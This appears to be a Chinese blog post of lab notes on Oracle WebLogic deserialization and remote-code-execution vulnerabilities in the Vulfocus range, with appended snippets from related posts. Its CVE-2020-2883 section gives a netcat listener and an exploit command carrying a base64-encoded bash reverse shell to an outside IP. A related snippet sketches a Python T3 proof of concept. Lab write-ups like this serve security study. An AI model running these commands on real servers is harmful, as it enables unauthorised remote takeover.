Vulfocus靶场-代码执行(Weblogic)-1

原创 已于 2025-11-27 10:24:43 修改 · 1k 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #运维 #网络

于 2025-07-03 09:12:33 首次发布

Weblogic反序列化

xml反序列化:wls security组件对外提供的webserver页面,通过xmlDecoder功能来解析用户的xml数据导致的任意字符串被当作代码去执行。

特征:服务器开放7001端口、传递xml数到wls-wsat、数据包内容有bash或dnslog字段

权限绕过:./绕过

Weblogic7001端口,默认会开启T3协议服务,T3协议触发的WeblogicServer WLS Core Components中存在反序列化漏洞,攻击者可以发送构造的恶意的T3协议数据,获取目标服务器权限。T3协议是Oracle WeblogicServer的默认通信协议,支持多种数据类型的传输和对象序列化,提供高效的通信效率和良好的可扩展性。应用场景:远程EJB调用、JMS信息传递、RMI。

Weblogic 反序列化(CVE-2020-2883)

CVE-2020-2883 是一个影响 Oracle WebLogic Server 的严重漏洞。该漏洞允许未经身份验证的攻击者通过 T3 协议网络访问并破坏易受攻击的 WebLogic Server,成功利用该漏洞可导致远程代码执行

  1. 访问 WebLogic 控制台: 访问 URL:http://:/console 确认 WebLogic 服务器是否成功运行。

  2. 反弹 Shell: 在攻击机上监听端口: nc -lvvp <port> 使用脚本反弹 Shell: python cve_2020_2883_exp.py -u http://<ip>:<port>/ -c "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTkuMjkuNjcuNC85ODk3IDA+JjE=}|{base64,-d}|{bash,-i}" 成功反弹 Shell 后,可以查看目标机器上的 flag^1^。

weblogic 反序列化 (CVE-2020-2551)

Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 该漏洞原理上类似于RMI反序列化漏洞(CVE-2017-3241),和之前的T3协议所引发的一系列反序列化漏洞也很相似,都是由于调用远程对象的实现存在缺陷,导致序列化对象可以任意构造,并没有进行安全检查所导致的。

weblogic 远程代码执行 (CVE-2018-3245)

WebLogic是美国Oracle公司出品的一个应用服务器,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。该漏洞通过利用RMI机制的缺陷达到执行任意反序列化代码的目的。攻击者可以在未授权的情况下将payload封装在T3协议中,通过对T3协议中的payload进行反序列化,从而实现对存在漏洞的WebLogic组件进行远程攻击,执行任意代码并可获取目标系统的所有权限。

weblogic 远程代码执行 (CVE-2019-2725)

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。

weblogic 反序列化 (CVE-2020-2555)

Oracle Coherence为Oracle融合中间件中的产品,在WebLogic 12c及以上版本中默认集成到WebLogic安装包中,T3是用于在WebLogic服务器和其他类型的Java程序之间传输信息的协议。 该漏洞允许未经身份验证的攻击者通过构造T3网络协议请求进行攻击,成功利用该漏洞可实现在目标主机上执行任意代码。使用了Oracle Coherence库的产品受此漏洞影响,在WebLogic Server 11g Release(10.3.4)及以上版本的安装包中默认集成了Oracle Coherence库。

weblogic 反序列化(CVE-2017-10271)

Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。

weblogic 反序列化 (CVE-2018-2628)

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。WLS Core是其中的一个核心组件。 攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。

weblogic 反序列化 (CVE-2019-2729)

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 CVE-2019-2729漏洞是对CVE-2019-2725漏洞补丁进行绕过,形成新的漏洞利用方式,属于CVE-2019-2725漏洞的变形绕过。与CVE-2019-2725漏洞相似,CVE-2019-2729漏洞是由于应用在处理反序列化输入信息时存在缺陷,攻击者可以通过发送精心构造的恶意HTTP请求,用于获得目标服务器的权限,并在未授权的情况下执行远程命令,最终获取服务器的权限。

weblogic wls-wsat组件远程命令执行(CVE-2017-3506)

Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。

复现CVE-2021-2109 (Weblogic Server远程代码执行漏洞)
记录并分享学习安全的知识点..
01-19 4468
一、漏洞介绍 20211月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 二、影响版本 WebLogic 3.6.0.0 WebLogic 1.3.0.0 WebLogic 2.1.3.0 WebLogic 2.1.4.0 漏洞判别方式:http://x.x.x.x:7001/conso
WebLogic 反序列化漏洞(CVE-2019-2890)复现(超详细)
渗透之路,攻防之间皆学问
03-16 1万+
目录 一. 漏洞介绍 二. 影响范围 三. 漏洞环境搭建 四. 漏洞复现 五. 漏洞修复 六. 漏洞检测poc 很多漏洞复现文章都不够详细,就是你按照他写的去复现会出很多很多的问题。我综合了几篇文章,写下这最详细的复现步骤。希望能帮助大家少走弯路 一. 漏洞介绍 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞,漏洞编号为CVE-2019-2890。 Weblogi...
weblogic 反序列化 (CVE-2018-2628)漏洞复现
YouthBelief的博客
11-01 649
weblogic 反序列化 (CVE-2018-2628) 前言 Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务器,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 0x01 漏洞描述 WLS Core是其中的一个核心组件。 攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开
CVE-2018-2628漏洞复现
玄道的网安博客
06-07 5002
1. 漏洞简介 Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机. T3协议在开放WebLogic控制台端口的应用上默认开启. 攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击. 2. 影响
Weblogic反序列化漏洞复现(CVE-2018-2628)
DaWan
09-21 1235
Weblogic反序列化漏洞(CVE-2018-2628环境搭建工具准备漏洞复现 环境搭建 使用vulhub进行环境搭建,具体的步骤可以自行百度 工具准备 下载ysoserial,为了启动JRMP Server EXP地址:https://www.exploit-db.com/exploits/44553 漏洞复现 使用namp查看是否启用T3协议: nmap -p 7001,7002 -T4 -A -v --script weblogic-t3-info 192.168.120.161 启动JRMP Se
Weblogic反序列化命令执行漏洞(CVE-2018-2628)复现
君莫hacker的博客
09-11 1万+
目录0x01 漏洞介绍0x02 环境部署:0x03 漏洞复现0x04 漏洞修复 0x01 漏洞介绍 漏洞描述 Weblogic Server WLS Core Components反序列化命令执行漏洞(CVE-2018-2628),该漏洞通过T3协议触发,可导致未授权的用户在远程服务器执行任意命令 漏洞编号 CVE-2018-2628 受影响版本 Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2 Weblogic 12.2.1.3 0
weblogic CVE-2018-2628复现
Armandhe的博客
06-15 3133
无言
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2725)
00勇士王子的博客
07-15 1074
漏洞介绍 名称: weblogic 远程代码执行 (CVE-2019-2725) 描述: Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。 由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。 解题过程 1.访问靶场 2.漏洞存在于:_async/
[Vulfocus解题系列] weblogic 远程代码执行 (CVE-2019-2729)
00勇士王子的博客
07-15 2397
漏洞介绍 解题过程 1.访问靶场 2.漏洞存在于:_async/AsyncResponseService,访问地址可以访问则存在漏洞 3.使用burp抓包然后构造payload发送到服务器,使服务器执行命令 执行id命令 执行whoami 命令 执行ls /tmp 命令,没有返回结果 POC ...
Vulfocus解题复现】joomla 远程代码执行 (CVE-2021-23132)
温氏效应
11-23 5725
Joomla是一套知名的内容管理系统,其使用PHP语言和 MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上运行 Joomla官方发布安全公告,修复了Joomla中的一个远程代码执行漏洞(CVE-2021-23132),其CVSSv3评分为7.5。由于Joomla com_media模块对上传文件校验不严格,攻击者可以通过上传恶意文件,从而实现远程代码执行
WebLogic远程代码执行漏洞 CVE-2020-14882
Longwaer
01-13 637
通过笔记详细了解中间件漏洞复现流程。
WebLogic 反序列化漏洞(CVE-2019-2890)
午夜安全
10-20 3556
WebLogic 反序列化漏洞(CVE-2019-2890) 漏洞描述 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞,漏洞编号为CVE-2019-2890。 Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以...
Weblogic反序列化漏洞原理分析及漏洞复现(CVE-2018-2628/CVE-2023-21839复现)
热门推荐
网络空间安全学习
09-19 1万+
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
Weblogic WLS Core Components 反序列化命令执行漏洞 CVE-2018-2628 漏洞复现
ADummy的博客
03-01 409
Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) by ADummy 0x00利用路线 ​ 启动一个JRMP Server—>执行exp文件—>命令执行 0x01漏洞介绍 ​ 在 WebLogic 里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 7053
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
CVE-2018-2628漏洞复现(基于vulhub非常详细!)
weixin_63960760的博客
09-12 3602
1、漏洞描述Weblogic Server WLS Core Components反序列化命令执行漏洞(CVE-2018-2628),该漏洞通过T3协议触发,可导致未授权的用户在远程服务器执行任意命令2、漏洞影响版本3、漏洞成因攻击者利用RMI绕过weblogic黑名单限制,将加载的内容利用readObject解析,造成反序列化漏洞,该漏洞主要由于T3协议触发,所有开放weblogic控制台7001端口,默认开启T3服务,攻击者发送构造好的T3协议数据,获取目标服务器的权限。
weblogic cve-2018-2628复现
sojrs_sec的博客
12-24 991
前言 前面有分析过cve-2017-10271的xml反序列化漏洞,这次挑了cve-2018-2628尝试着分析看看,相比较xml反序列化只要一个http包而言,T3协议的反序列化利用过程显得更加复杂一些,因此在正式分析之前,这里做个简单先把复现的过程记录一下 环境 被攻击机 192.168.99.37 Ubuntu16 Vulhub 攻击机 Mac 192.168.96.111 复现步骤 Ubu...
Weblogic 反序列化命令执行漏洞(CVE-2018-2628)漏洞复现【vulhub靶场
m0_55854679的博客
08-08 2442
WebLogic 里,攻击者利用其他rmi【远程方法调用】绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。......
vulfocus/weblogic-cve_2021_2394
最新发布
03-29
### 关于WebLogic CVE-2021-2394漏洞的信息 CVE-2021-2394 是 Oracle WebLogic Server 中的一个反序列化漏洞,允许未经身份验证的攻击者通过 T3 协议发送恶意数据包来实现远程代码执行 (RCE)[^6]。此漏洞的影响范围包括以下版本: - **Oracle WebLogic Server 12.1.3** - **Oracle WebLogic Server 12.2.1.x** #### 漏洞原理 该漏洞源于 WebLogic 的 `wls9_async_response` 组件未能正确处理传入的数据流,在解析过程中存在反序列化的安全隐患。由于未经过充分的身份验证校验,攻击者可以构造特定的 Java 对象并触发 RCE 行为。 --- ### VulFocus 环境搭建指南 VulFocus 提供了一个便捷的方式来快速部署漏洞复现环境。以下是针对 CVE-2021-2394 的具体操作方法: #### 步骤说明 1. 安装 Docker 和 Docker Compose 工具。 如果尚未安装这些工具,请运行以下命令完成安装: ```bash sudo apt-get update && sudo apt-get install -y docker.io docker-compose ``` 2. 下载目标镜像。 使用官方提供的脚本拉取对应漏洞容器: ```bash git clone https://github.com/vulfocus/vulfocus.git cd vulfocus/weblogic-cve-2021-2394/ sudo docker-compose up -d ``` 3. 启动成功后访问服务地址,默认端口通常设置为 `7001` 或其他指定配置项中的值。 > 注意事项:确保主机防火墙已开放必要通信端口,并确认资源充足以支持虚拟机正常启动[^5]。 --- ### Exploit PoC 实施流程 目前公开可用的一种 POC 脚本如下所示,基于 Python 编写而成用于测试目的仅限合法授权范围内使用! ```python import socket from struct import pack def create_exploit_payload(): # 构造payload部分省略实际细节... payload = b"\x00\x00" + ... # 自定义shellcode填充区域 return payload target_ip = "192.168.1.10" port = 7001 try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, port)) header = pack(">I", len(create_exploit_payload())) s.send(header + create_exploit_payload()) except Exception as e: print(f"[!] Error occurred: {e}") finally: s.close() ``` 上述代码片段展示了如何向受影响服务器投递精心设计好的字节码从而达成控制意图[^7]。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值